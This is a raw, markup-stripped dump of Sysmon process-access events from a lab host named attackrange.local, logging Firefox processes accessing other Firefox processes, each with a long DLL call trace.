Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cf41|C:\Program Files\Mozilla Firefox\xul.dll+1724ba8|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla 
Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106ce41|C:\Program Files\Mozilla Firefox\xul.dll+17249fe|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106cd41|C:\Program Files\Mozilla Firefox\xul.dll+172484f|C:\Program Files\Mozilla Firefox\xul.dll+2ba9867|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2ba9755|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla 
Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 
10341000x800000000000000016983Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla 
Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla 
Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla 
Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla 
Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla 
Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 
10341000x800000000000000016972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10409dd|C:\Program Files\Mozilla Firefox\xul.dll+101380a|C:\Program Files\Mozilla Firefox\xul.dll+10136f4|C:\Program Files\Mozilla Firefox\xul.dll+afc707|C:\Program Files\Mozilla Firefox\xul.dll+2ba9464|C:\Program Files\Mozilla Firefox\xul.dll+2bccd18|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1 10341000x800000000000000016971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:59.474{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451bae|C:\Program Files\Mozilla Firefox\xul.dll+10138a6|C:\Program Files\Mozilla 
